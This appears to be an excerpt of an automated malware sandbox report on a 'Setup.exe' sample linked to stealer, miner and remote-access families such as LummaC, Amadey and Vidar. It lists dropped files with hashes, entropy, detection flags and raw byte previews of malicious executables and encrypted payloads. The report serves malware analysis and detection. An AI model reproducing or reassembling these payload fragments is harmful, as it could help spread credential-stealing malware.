                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):0.7307872139132228
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:NlllulF/lll:NllUF/ll
                                                                                                                                                                            MD5:3ECB05F56210644B241FF459B861D309
                                                                                                                                                                            SHA1:1A33420F5866C42A5ED3CFF0DD505451FBFA8072
                                                                                                                                                                            SHA-256:712FFFDDF0CCED8E7AD767551D53F38D2682E171595701A31F73AC916F7134E0
                                                                                                                                                                            SHA-512:79DC8B376BDAE7F0BA59108D89D9DA4CD6B1E7AB0280DB31A030E4C4507AB63D22D9DF6443DE18E92D64382AA97F051AC1D6FAFE07CA9281BEBD129A91EB19B8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:@...e.................................^.........................
                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):947288
                                                                                                                                                                            Entropy (8bit):6.630612696399572
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                            MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                            SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                            SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                            SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: GoldenContinent.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Full-Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Full-Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):485033
                                                                                                                                                                            Entropy (8bit):7.999622677241369
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:12288:T0n+LzgC7Jg8hj2FYbn2NJodMF32iOI+8pRPPZ8aE+gmemXk:T0n+LznhyMn2odO3aIJ7PPZDkpl
                                                                                                                                                                            MD5:C8BCC7EFC9A0A945F8FEB4A3CA93A5C8
                                                                                                                                                                            SHA1:1A528FA9039A63FD26DEE3AABBFFBE04E3A48AFF
                                                                                                                                                                            SHA-256:4FD550298E4381871ADD39034076FB4807D2943248748E241662E1410CD6A79E
                                                                                                                                                                            SHA-512:CB8D6C820FEC4B048CDCE893F3FC0C4EDE2C17A4709CED46DD2713399C9C558DA0E9C814B6BAC090537CE5148C2132634D9A4C94C0ED314B8B5444F0F3DEACD8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:...:.J.8.QA..E..C."...|Y..X...,...C..p......:C....~v.%.E.|.a{.9.W/......0...^.Wu.......y....i.....h....u.tx...$E..C._...^.......7V=B.U...?8.R..U....).^.."^..o...g...86.;..K|.Y...P......J.2S`!.>.q....}...v..{..U...\..Y.....P..#..."..-.%..i.Ed..>UB.,U....8....O`.M.........,.*\.z.....r.....^...bV7f.bS..-.%.....h..L."|....6<..b=.$f..;?;..L.S.j..E......o.=....tU[._.....-/.|-p[o.f&..|......#....E5a|n.(.V..B3....4.O....d..Wu.Ne.:t .!.'.3..Kyh%....,)n.n.h.c....F....+(W.....W.V..t....=..qI]RJ+o\!.J.....PV8..... .M235.yl.......E.5G...........`OO2w.<)...Q......t&......u.s..X..SU..eI-:...c:.%L\...M..V".vE].X.%.v3.k....k.....'?"..]>.K.Z.....5>.~.5.......k(..6v5.3.8..f...oC.y....N?....z2.P..^l.;Faij|5|.:...Q..D'..Z.....4.KC...n..Z...\:Y5....ub]h..@..J.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):73728
                                                                                                                                                                            Entropy (8bit):6.472997374549826
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:Ep7HE+tKA3QkvyNf7Xw2U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+x:syA3laW2UDQWf05mjccBiqXv0
                                                                                                                                                                            MD5:18C1428A7B79988F9681AA014C1650E2
                                                                                                                                                                            SHA1:A6FA9EC2F84EE0F4AE4FE5A8952C05582BF5FC3A
                                                                                                                                                                            SHA-256:9E8642A3207321BF3381D18A556195BB365AE96BD307C4579D7778DA014F60DD
                                                                                                                                                                            SHA-512:8C3D70C023E5EDE9CBE455A65814EFE7FDA87901F305D5102AD73AC819A2AEA18BB6E00A7FD45369DA83BC421DDDAE20C433B9BB48998B5C26E4A931B8D51F91
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.L.......h.L.....f..l.L.....p.L...J...|.L...G.....L.........L.........L.........L.....f....L.......L.(.J.....L.2.G.....L.........L.........L.........L.....f....L.......L...I.....L.{.A.....L.........L.........L.........L.....f....L.......L...I.....L.q.A.....L.........L.........L.........L.....f....L.......L...I.....L...G.....L.........L.........L.........L.....f.. .L.....$.L...I...0.L...G...4.L.......8.L.......<.L.......@.L.....f..D.L.....H.L...J...T.L.[.G...X.L.......\.L.......`.L.......d.L.....f..h.L.....l.L...J...x.L...@...|.L.........L.........L.........L.....f....L.......L...J.....L...A.....L.........L.........L.........L.....f....L.......L...I.....L.O.G.....L.........L.........L.........L.....f....L.......L.`.I.....L.c.G.....L.........L.........L.........L.....f....L.......L.4.J.....L.%.G.....L.........L.........L.........L.....f....L..... .L...J...,.L...G...0.L.......4.L.......8.L.......<.L.....f..@.L.....D.L...J...P.L.@.G...T.L.......X.L.......\.L.......`.L.....f..d.L.....h.L...
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:Atari 68xxx CPX file (version 0064)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):59392
                                                                                                                                                                            Entropy (8bit):3.694569408389299
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:+GfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8q:3AsAhxjgarB/5el3EYr
                                                                                                                                                                            MD5:CC7ECE8744674A7D06C60C3E6BF4BB2F
                                                                                                                                                                            SHA1:39E89ADE98B9A8B66DD0D50E68EB7DCF27978AEF
                                                                                                                                                                            SHA-256:B678E8A5B74AE89AF6B3207DCAFDC9C39002044ECCBD50F730592819F7621ED6
                                                                                                                                                                            SHA-512:061975D724EDA1DF409EC2C85E976C470832D1A6AE33B4AF9876F37853BB92195853468EE6C9D3DEBF2EF6B4F6F124D221AEA4A3DE39D7A62C3F32A154754BD2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.d.%.0.2.d.%.0.3.d...%.4.d...%.0.2.d.....%.0.3.d.....*...*...........L.P.T...a.l.l...c.d.r.o.m...........r.e.m.o.v.a.b.l.e...f.i.x.e.d...n.e.t.w.o.r.k...r.a.m.d.i.s.k...u.n.k.n.o.w.n...:.\.....c.l.o.s.e...c.l.o.s.e.d.....o.p.e.n..... .t.y.p.e. .c.d.a.u.d.i.o. .a.l.i.a.s. .c.d. .w.a.i.t...s.e.t. .c.d. .d.o.o.r. ..... .w.a.i.t...c.l.o.s.e. .c.d. .w.a.i.t...P.h.y.s.i.c.a.l.D.r.i.v.e...R.e.m.o.v.a.b.l.e...F.i.x.e.d...N.e.t.w.o.r.k...C.D.R.O.M...R.A.M.D.i.s.k...U.n.k.n.o.w.n...S.S.D...S.C.S.I.....A.T.A.P.I...A.T.A...1.3.9.4.....S.S.A...F.i.b.r.e...U.S.B...R.A.I.D.....i.S.C.S.I...S.A.S...S.A.T.A.....S.D.....M.M.C...V.i.r.t.u.a.l...F.i.l.e.B.a.c.k.e.d.V.i.r.t.u.a.l...R.E.A.D.Y...I.N.V.A.L.I.D...N.O.T.R.E.A.D.Y.....R.E.A.D.O.N.L.Y.....U.N.K.N.O.W.N...%.l.u...\.?.?.\.%.s.......l.n.k.......*.....R...A...N...O...C...T...6Q.B~.C....]._.G.U.I._.R.U.N.D.E.F.M.S.G...<.l.o.c.a.l.>...E.n.v.i.r.o.n.m.e.n.t...D.I.S.P.L.A.Y...m.s.c.t.l.s._.p.r.o.g.r.e.s.s.3.2...A.U.T.O.I.T.C.A.L.L.V.A.R.I.A.B.L.E.%.d....
                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):80896
                                                                                                                                                                            Entropy (8bit):7.997659747996092
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:1536:L5JwicSfMIRB2Nhgaxv9X9pqvU9PBKgUVkz8D4E7h/YXiH:LMicSeNh37pquogUQk97h/YSH
                                                                                                                                                                            MD5:37D0F95BFF0FCAC89CB31BA38C3A05F4
                                                                                                                                                                            SHA1:81BE735684D279B24790B9CC5ABA209D1765CD8C
                                                                                                                                                                            SHA-256:3B860E4A353F970E51AB4DCEA648EA93CA0D65C4D543B3294C67AB1AD239F7F9
                                                                                                                                                                            SHA-512:5CB6FF4CC1A991F1E1CCD1BE8A6CE88197DE9D4A00AA0FB177721D1F703E994CAE41085526A2C24C18D5000BFAB266424D91A1B32299A0830C6E8B05D4827688
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:3.+.s.U._4Ua5.b...B,@`......$uC.H.........%..v<...`..B..(y0..v$Z.W.......r..Ah`....N..._...?*1..`..3.Di._...G...:@...[.a....\4.MQ...L..gi......}z...p..@..bGZ_...7.4.4:2.n..9Q.k...3..An@.%.$...8.."h\].........aA....:....v.a?.f#.../..k1}....]2....IZR..g...OLL...+...g.....F.w..._.[...t.).......3z.,....1.@..p..c....pS...k....K.b.S{.U...p.vQH~N.E.b.....u`.CkF..nt....<..6.X.4>.X..,...*.6&(F..FN..q)...Q2.+..D......g......s@....S:...*<.."U.<&s.g..K...9'[..Dj.....m.`.... N#../.pb:..I....q........o...nDZ. ....a`.._.......Cp.+..Pd.7...U..gi(...~.d.QE|..6..u\.<.<..'7....iM.8Q.;..G.P...TH.v].....I......5.6.WF.E...X1.....^G.0p.._.....R.g.2....y.w..[d...R......el.vd_..r...T..k!5...r...5I........k..c.7...%...B.L.~_P...3..O..e.W..6........gd...+....)S.N.."IR.i...o|..J.0...>...5... .M.3.....&.S.....w.gQ...x.u.\.X.,6....HZ.6..1ao(.U.....p......I.Gq.[s......)..K..p..'f:..0cL!.y..X.....D.....B...O........D~v.....f]?.P..3`..F...A.....Z.$........H....
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):105472
                                                                                                                                                                            Entropy (8bit):6.669790819534835
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:I/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cxi8q0vQEcmFdnV:IgF4qv+32eOyKODOSpQSAU4CE0ImbV
                                                                                                                                                                            MD5:A4CD52A0BD026D306252337DAF23EADC
                                                                                                                                                                            SHA1:CBA1B2603F906AE27A49EA29854A229377C3A791
                                                                                                                                                                            SHA-256:5546AF727D9CE89C765D6BA401E2CB5226BFCEE6F2E61C4A4DB2DB2C61C761B5
                                                                                                                                                                            SHA-512:66E8FD2089F6BD78E56D4F72798FB46CB8258A0FC9DFE1BAA3983C6A79FBB06B166419E1D299A776FEBF1793C4ECDF835BEE70F2806F2A610821697A8012FCE4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.N ..F(Z..y ..F2..at...At..F(..... .F(......u...F2f;.t.f;.u..F(.....F(.~@S.].......P.w.....u....T...+.F(........u...e...e...F4.F...N..A..E..A...E...............u....v...F2.v..6.v(PQ...%...P.......P.E.SP......F ..(...[..t..~(.u..v..v4....YY..F2jgYf;.t.jGYf;.u..F .....u..v..v4....YY.F4.8-u..N @@.F4.V4..<it.<It.<nt.<Nu.jsXf.F2.z...B..u.+.._.V8^..]..V..W.v,..F1P.v..6.........~@..t9.F...F.S........@...u...P.......P.F8SP.h......[..t%.F0...........u...F...F..@....F8............t....~4.._^.....U..QSV..W.F<..F...F..v,..X...F2P.v..6.x.......~@..u2.......]..E...u...F.P...p..E.PQ........y..F0...........u...f..........t....~4.._.F8....^[..].....U..SV...v,.....Y.....tx...tVI...t3...t..8n.........@...2.......F .F........F..H..P..X.F .F........F.t..@..?.H.3..;.F .F........F.t...@..!..@....F .F........F.t...@.....@....W.~ .......t.....|...s........@.~ .~(._}..F(.......f ......9F(~..F(....u..f ..u..u....u.RQ.........Q...[....F .....t..~8.t..F4.80t..N4.N4..0.F8..^[].....V..W.F...F..x....
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):75521
                                                                                                                                                                            Entropy (8bit):7.11227339350969
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:9Wyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:9Wy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                            MD5:C79EA67911B41DA1C3C9DAA720CA69F7
                                                                                                                                                                            SHA1:3851E7A518B7910D153BCE8D6C9BA681B7DFD4A2
                                                                                                                                                                            SHA-256:A5DC5C696272E784BEDEC05C4FE59FD6EA134EA4010225802CAB9416D016A1D7
                                                                                                                                                                            SHA-512:77C3EB26280368787B32D450EA85D3B25F2B8C4DAF45CF81ACD4883C6116D2C4CE6A43A605BE6B33452A1C8A1B1A95EC96EC125758FF5A473BF496323CE12915
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:............................................................................................................................................................................................................................................................................................................................................................................................................................................................................,................-................,.....'()*(((((+......"#$%.....&.............. ..!..................................................................................................................................................................................................PNG........IHDR.............\r.f.. .IDATx..y.\.u..9..2=........`..v.$.M$%.%G.-...N='.?.v...r.]~q..$.$/..eW..8.R..d.Y.v..WA.Ab.1.....{...)............(L..w...;.............,+... .......H....E$......E......1..................T5.....:."..e...D.d.ficc....
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):87040
                                                                                                                                                                            Entropy (8bit):6.4250106136589515
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:Q1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFgQa8BpDzdZM:QZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/w
                                                                                                                                                                            MD5:75A7D116D2BC4524195A666614779937
                                                                                                                                                                            SHA1:0E3031B1DC1B7740D0A546B6B2D323D311F7CE60
                                                                                                                                                                            SHA-256:722CA9F3CACA0560B1B119CD4F3404F18E40661F38D8D06E6C7168FACD7BE1F2
                                                                                                                                                                            SHA-512:D0E9F41ED0B4C3277A18A06B226B4A3EA37D1C1241E7E9CEF06C7D9FBBFA35BECFEA4E28282D4CBC327AC2E75DF23035BB3258A2599E133ACA053485FE19B378
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.
                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):51200
                                                                                                                                                                            Entropy (8bit):7.995783687451405
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:768:mup2K8kIP7ZURd2kXG9GRZwJ2xbkGM73VQAl5neZ3c+hyUo6K8GTC:EKIORANER+hb73V1zV+Il6Kq
                                                                                                                                                                            MD5:2E5AE9F02370714048CC3D0DF2493C1D
                                                                                                                                                                            SHA1:03CA65386B757DB9789104F1C1A38FA5986DDD42
                                                                                                                                                                            SHA-256:418A8C8C10257B49A891E07332C5C0B2AE92FD2A2ED97EEFB9BD2A40F0FA6359
                                                                                                                                                                            SHA-512:D6B4D4357A186AB3C0B0017A144C54C2E132BFD3FDAA53C29CA623D5301B5763C46E6420659E973C4C8E3BB28A8EF60AA6AE44AFB809A2EF1AF1335CD6332F70
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:... .{.;...c,6....+G.N-.....b.-....&..-<F.._.. ..T.\!Ug.T<.=..VN#d..f..eOE...+......<.X.-..vv.>rao.L...o0a.S.83...r.#b}8.;..{se...2.U..;.......j.&...v..yOn..J...K..d....`G.q..+pK.v.~...?KB.[..W.4..L .G..L.....Q.hp...z49..^l..s.8D...v..S.lb%..m8.T. ....z....7."e%t..]c.w%Y^`$..(.kP.=tf..E..D.U,......x(...S.........W..V.....A...G....m.h=.5A.......i......._q..{.=~9.],N.......tX]....*p.tR..8.......0..E...Ds....).r.....j...G)...+...L ..Zq....Sz..o.X...!.>...{..&E..v..T......R..8.l@..../.1.L.a.T......R.!]..cc......2...6.>.A.S...$...jY..j.a..>.....Q.....z.(.;B.+.Z.K...I...~.&6-@...h....u....~.N.g.zt,..uMCK.)...h.g8B..K.ft..^..;.F..'..D....G$.$..O.....3.....H.,....B.'....|L.....yI.nC.....T....<...C/...Ei....]......{.i..H.....z...~..f.M.j......l....%o4H..&N........3.J...,...n).Qh........K(^9u.. @Y@.w.i._.-UO...E.:..Q....dJ......W.J.....+.J.vj.......x^..b.........j....2.....z.M....S.e`.-;.k.... '..."9...7GB.....*mt$#)q.Z.e.=.Z.*..T........[mcH.!.A
                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):84992
                                                                                                                                                                            Entropy (8bit):7.997877320808271
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:1536:kAR+HcpQiVMIPYOVXFLkqJ51gns5uF4RJRKr1mCJeRElZRYp4oePYFtuRkymn7UH:5+HcpJVDYKSY51PEFIRKhJJfRYpGYFzs
                                                                                                                                                                            MD5:F861A473D9C0CD1B5AC03CB2E0CBAF83
                                                                                                                                                                            SHA1:50A03E8AC65BE216F11C20F87899FB6B3CB70A53
                                                                                                                                                                            SHA-256:92A3EE9B920652298DEA3C83F956CFB35E5FE091F0DD50359B418B7DA62CED33
                                                                                                                                                                            SHA-512:EDA1272AE29CBD7A1B9786DA0A0D3678CE8CA8E615DB09F9A3ACB48902272CEF1EC155E39828BB1C921A74BF7A2C5159C1B4C906867C08437EBB6DE99104A9B4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:;w:.....S...`D.l..mK.1V..r.).$.'C.}."..]/9...!...4{C<$.Q...Y.........|,<...2.*PY.2{..[X.......KX.W.y...K....`...'....x..n.KoC..........F.i....c<...X.....@'..=./...}..r..(....p.h7...f....._W...UJ.u..H.....;7. mdj...G...&n.\.0a.....Y\.{F........8....y.V.=.......r.o.W[sd..."...0w:Mc...X9.<......-..n....-[...NH.W..%..?.9......>.....%.....,...ny@DK....q...1......u*Izy........2...9......H.5qt(...oB..R.:c........t<...QX.^@....X@...Z.Mo.....g.g...l...?7L$.b....DI....{.H..I.F..0|.^9...J.(..2:X.+.'.j...VX...WnZ..;B./...w..#....E.?...h..;......s..S.c......2w......l.k....@....^.....ri].j.(.J.!@...Z...[.B....U?QV....F..Pa..dqT.=A1.O...#=.........O....\....u..=.h.#Vz....?..dmB.,...e.......N....)..g.N......=...$u...i.g...-Z...w=..wD.\j....2.6.$,.../.z&.y.).9.<..<..%.8..h..u8.]...I......G(]......-.....=.....Tt......c....;..(A..vk......c.1..3......"6.OC.....-...........Q.1Lj8..zE1.@.....r..........#.9.1'..f.......\..._}h.g) _@......R.....7...@.
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):135168
                                                                                                                                                                            Entropy (8bit):6.5681523778956254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:3CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640eJ:3CThp6vmVnjphfhnvO5bLezWWt/Dd31w
                                                                                                                                                                            MD5:E6231FB7C4AD9D106B7038F0E5FF5DD8
                                                                                                                                                                            SHA1:B553DBFA3984CF00AB481A8B6F27AB388B2A6EED
                                                                                                                                                                            SHA-256:EF85FCB11A7A6965E0F0D6BD2C4A59DB13EC4CB632FDBC94E01EFA89B4108F88
                                                                                                                                                                            SHA-512:7FB2CCC8FF8800732EFADCCEF2B6F1A4600020F66973E521F555A9A55396C81122E15E59B037B95EEA76F0AFDEFB46CE04E4A0D2A3EFD24EA32624D070F37CBC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:P..D$$P..D$&P..D$&P..D$(P..$....h4{L.P......$.6..D$.P..D$.P..D$ P..D$"P..D$"P..D$$P.D$|hDzL.P..... .M..D$dP.9........M..;....\$........Qj.V......L$..D$pQhl{L.P.n.......D$d.L$TP..=..P.L$$. ...j.j..D$(PV.5.......L$ .ip...L$T.XG....D$..t{L.P.D$hWP.........D$d.L$TP..<..P.L$$.....j.j..D$(PV.........L$ ..p...L$T..G....D$.P.D$hWP........D$d.L$TP.r<..P.L$$.{...j.j..D$(PV........L$ ..o...L$T.F....D$.P.D$hWP.y.......D$d.L$TP."<..P.L$$.+...j.j..D$(PV.@.......L$ .to...L$T.cF....D$.P.D$hWP.).......D$d.L$TP..;..P.L$$.....j.j..D$(PV.........L$ .$o...L$T..F....D$.P.D$hWP........D$d.L$TP.;..P.L$$....j.j..D$(PV........L$ ..n...L$T..E............D$.P.D$hh.{L.P.}.......D$d.L$TP.&;..P.L$$./...j.j..D$(PV.D.......L$ .xn...L$T.gE...9.M.h..I.........@..|....L..t..I8.A......|....L..t..I8.A.._^3.[..]...U..E........x..SVW..u..0.I....@..p.........F....E..@..0........F.......S....k..Y<.u..M.......P.(....Ph0.I.S....Y....xL.Yt....I..M.P........H..|9...D9.t..@8.@......|9...D9.t..@8.@.._^3.[....U......
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1373
                                                                                                                                                                            Entropy (8bit):4.161989199920853
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:nyGS9PvCA433C+sCNC1skNkvQfhSHQU2L55en:E9n9mTsCNvEQH5O5Un
                                                                                                                                                                            MD5:30F4E50E37A0D3E5FD948CAD2D9E8869
                                                                                                                                                                            SHA1:CF90EE83E86761247D60AC3112973B6952FA1D45
                                                                                                                                                                            SHA-256:1A28498AA2E3A6E5257DF4E678E09FCD9FE095211471C28CBC1DA9CE10E6AD7E
                                                                                                                                                                            SHA-512:FFC580FFE4AC2C409DB5D6828A6A5D445A78EEF342A840961CE4DD9DB60E18A6F484BE1B44A6F680429E32D490749F2348397FCACD828FA15BB1C9FADAB6080B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Heater........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):92160
                                                                                                                                                                            Entropy (8bit):6.658861449703547
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:crKoUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYR:XPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBS
                                                                                                                                                                            MD5:FAFB10877CC404606BF7F46DF49E09B2
                                                                                                                                                                            SHA1:8DF1827A09D787BF3356C55F9BD09571E9846782
                                                                                                                                                                            SHA-256:B423CA1D48976AA11DED5B714443ADCE1BAC1AC88E68D3F8D3C1D546DCED8C2A
                                                                                                                                                                            SHA-512:DE7B52E34BDC43DEA359227F71A53AF54E8E66566028FAC1517D4BEE59304341E3BBB25EC7BE26868DD785C513EE5C19C954E18C32737B6F2B80D10F066AA696
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.x..u.V...P.....V.Q.....h....j.S.P............M..........e...U..R.U.RQ.PH.........M.....w......U.R.u.Q.P..}.........E.P...Q...3.3..}.................E..U.!}.RV..P.Q..}.........E..U.RVP...Q..E.U.RP...Q..U.R..B0.E..E.P...QL.M..9}.vL.E.U.RWP...Q ..u4.E..U.R.u..P.Q8.E.U.Rj.P...QH.E.;E.E.P.........Q.G;}.r..E.P...Q..}.F;...D....}.........M..U.RQ...P..u.}..E..u.P......QL.}..uW.e...E.P.E.P..D.I...xA.u.M..4....u...<.I.j.h..I..M...H..P.M......E.P.u...H.I..M..m....M.Q...P.j..E.P.E.P............@_^[..3.G.}..Q..E.P...Q..E.E..+...U..Q.e..V..M.WQh..J.....@..V....u..u.V...P ....V.Q..%...M.Qh..J.V....u..u.j.V...P.....V.P..._^...U...p...SV..3.W.M.]....].....M..|....M..t...h iL..M..ku..V.M..g[..hDiL..M..Z[...M..-.....t$j\Xf9.t.f9G.t.hTiL..M...u..W.M..*[..9].tLj .E.SP.M.......]..E..M.P.d...h\iL..M...Z...E.S.u..E..E..u.P....I............E.Ph.....u...$.I.....ut.E.Ph....S.u..u.....I..=..I.....uM.E..E.....P......PSSS.u... .I.....u$.E.3..u...E.f..E..........P..@.I....u....u...M..a....M..Y...
                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            File Type:Microsoft Cabinet archive data, 488491 bytes, 11 files, at 0x2c +A "Brunette" +A "Consist", ID 8064, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):488491
                                                                                                                                                                            Entropy (8bit):7.9985638740187595
                                                                                                                                                                            Encrypted:true
